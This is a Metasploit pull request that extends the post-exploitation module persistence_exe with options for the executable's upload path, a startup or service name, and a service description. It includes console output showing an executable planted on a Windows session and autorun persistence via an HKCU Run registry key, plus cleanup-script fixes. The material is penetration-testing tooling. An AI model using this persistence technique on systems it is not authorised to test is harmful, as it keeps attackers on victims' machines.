### PR TITLE
Improve post module persistence_exe

### PR DESCRIPTION
**Pull request by Green-m**
I add some functions and options to enhance this module.  

The usage of options which been added:

`LEXEPATH`  => the local exe path to run on the client computer. Using temp directory if this is not set. 

`STARTUP_NAME` => the name of service or registry. Random string as default.  

`SERVICE_DESC` => the description of service if startup type is service. Random string as default.

## Example output

```
msf5 post(windows/manage/persistence_exe) > set session 1 
session => 1
msf5 post(windows/manage/persistence_exe) > set localexepath c:\\windows\\system
localexepath => c:\windows\system
msf5 post(windows/manage/persistence_exe) > show options 

Module options (post/windows/manage/persistence_exe):

   Name      Current Setting                 Required  Description
   ----      ---------------                 --------  -----------
   REXENAME  default.exe                     yes       The name to call exe on remote system
   REXEPATH  /root/Desktop/msf_dev/test.exe  yes       The remote executable to upload and execute.
   SESSION   1                               yes       The session to run this module on.
   STARTUP   USER                            yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

msf5 post(windows/manage/persistence_exe) > show advanced 

Module advanced options (post/windows/manage/persistence_exe):

   Name                Current Setting    Required  Description
   ----                ---------------    --------  -----------
   LocalExePath        c:\windows\system  no        The local exe path to run. Use temp directory as default. 
   ServiceDescription                     no        The description of service. Random string as default.
   StartupName                            no        The name of service or registry. Random string as default.
   VERBOSE             false              no        Enable detailed status messages
   WORKSPACE                              no        Specify the workspace for this module

msf5 post(windows/manage/persistence_exe) > set startupname msfdevtest
startupname => msfdevtest
msf5 post(windows/manage/persistence_exe) > show advanced 

Module advanced options (post/windows/manage/persistence_exe):

   Name                Current Setting    Required  Description
   ----                ---------------    --------  -----------
   LocalExePath        c:\windows\system  no        The local exe path to run. Use temp directory as default. 
   ServiceDescription                     no        The description of service. Random string as default.
   StartupName         msfdevtest         no        The name of service or registry. Random string as default.
   VERBOSE             false              no        Enable detailed status messages
   WORKSPACE                              no        Specify the workspace for this module

msf5 post(windows/manage/persistence_exe) > exploit 

[*] Running module against PC-XXXXXX
[*] Reading Payload from file /root/Desktop/msf_dev/test.exe
[!] Insufficient privileges to write in c:\windows\system, writing to %TEMP%
[+] Persistent Script written to C:\Users\T450\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\T450\AppData\Local\Temp\default.exe
[+] Agent executed with PID 4572
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\msfdevtest
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\msfdevtest
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/PC-XXXXXX_20180302.1949/PC-XXXXXX_20180302.1949.rc
[*] Post module execution completed

```

### CODE REVIEW

File: modules/post/windows/manage/persistence_exe.rb [hunk 1]
```diff
@@ -34,10 +34,18 @@ def initialize(info = {})
...
+        OptPath.new('REXEPATH', [true, 'The remote executable to upload and execute.']),
         OptString.new('REXENAME', [true, 'The name to call exe on remote system', 'default.exe'])
       ], self.class
     )
+
+    register_advanced_options(
+      [
+        OptString.new('LEXEPATH', [false, 'The local exe path to run. Use temp directory as default. ']),
+        OptString.new('STARTUP_NAME',   [false, 'The name of service or registry. Random string as default.' ]),
+        OptString.new('SERVICE_DESC',   [false, 'The description of service. Random string as default.' ])
```
Comment (void-in) [inline modules/post/windows/manage/persistence_exe.rb]: The advanced datastore options should be camel style i.e. LocalExePath, StartupName, and ServiceDescription

Comment (Green-m) [reply modules/post/windows/manage/persistence_exe.rb]: I have fixed it. 
Thanks for your advice.

**Comment by jmartin-r7** [comment]
Jenkins test this please.

**Comment by Green-m** [comment]
I fixed a bug when use `clean_up_rc ` file to clean the local file.
The bug is windows directory need double slashes not single slash.  

And I added code so that  `clean_up_rc `file could delete the registry now. 

## output before 
```
meterpreter > resource /root/.msf4/logs/persistence/PC-XXXXXX_20180302.1949/PC-XXXXXX_20180302.1949.rc
[*] Processing /root/.msf4/logs/persistence/PC-XXXXXX_20180302.1949/PC-XXXXXX_20180302.1949.rc for ERB directives.
resource (/root/.msf4/logs/persistence/PC-XXXXXX_20180302.1949/PC-XXXXXX_20180302.1949.rc)> rm C:\Users\T450\AppData\Local\Temp\default.exe
[-] stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.
resource (/root/.msf4/logs/persistence/PC-XXXXXX_20180302.1949/PC-XXXXXX_20180302.1949.rc)> kill 4572
[-] The following pids are not valid:  4572.  Quitting

```

## output after 

```
meterpreter > resource /root/.msf4/logs/persistence/PC-XXXXXX_20180302.1928/PC-XXXXXX_20180302.1928.rc
[*] Processing /root/.msf4/logs/persistence/PC-XXXXXX_20180302.1928/PC-XXXXXX_20180302.1928.rc for ERB directives.
resource (/root/.msf4/logs/persistence/PC-XXXXXX_20180302.1928/PC-XXXXXX_20180302.1928.rc)> rm C:\\Users\\T450\\AppData\\Local\\Temp\\default.exe
resource (/root/.msf4/logs/persistence/PC-XXXXXX_20180302.1928/PC-XXXXXX_20180302.1928.rc)> kill 10000
[-] The following pids are not valid:  10000.  Quitting
resource (/root/.msf4/logs/persistence/PC-XXXXXX_20180302.1928/PC-XXXXXX_20180302.1928.rc)> reg deleteval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' -v 'msfdevtest'
Successfully deleted msfdevtest.


```

**Comment by jrobles-r7** [comment]
# Release Notes
The PR updates the persistence_exe module to include additional options to allow naming a service, providing a service description, and specifying where to uploading an executable onto the system.

**Pull request merged**